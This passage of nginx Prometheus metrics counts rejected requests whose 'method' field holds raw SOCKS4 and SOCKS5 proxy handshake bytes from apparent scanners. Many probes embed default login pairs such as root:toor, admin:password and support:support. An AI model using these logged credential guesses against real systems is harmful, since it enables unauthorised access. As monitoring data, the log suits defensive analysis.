nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:abc123\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15root:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15support:admin\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15support:support\\x00",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15upload:upload\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15user1:user1\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x15uucp:uucp\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:123456\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:admin123\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19admin:password\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19root:root\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19root:toor\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19support:support\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user1:user1\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:1234\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:P4ssw0rd\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19user:user\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xCE{\\x91\\x19view:view\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x00P\\xD0_p\\x01\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x01\\x00\\x00\\x01\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x02\\x10j\\x1E\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x22\\xA0o\\x91\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x22u;Q\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\x8E\\xFA\\xB3\\xA4\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x04\\x01\\x01\\xBB\\xD4/\\xFA\\x0E\\x00",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x05\\x01\\x00",status="400",vhost="-"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x05\\x02\\x00\\x02",status="400",vhost="-"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="\\x09\\x12;Bo3\\xA2D\\xFD\\x01\\x86si=\\xAE\\x12\\xBB\\xC6\\x19\\xFD\\x1A:\\xF3\\x11\\xC9\\xAE\\xDA<0\\xBC8\\x81\\x9E\\x00\\x0F\\xCAN\\xFB\\x05\\xC6\\xDE\\xB7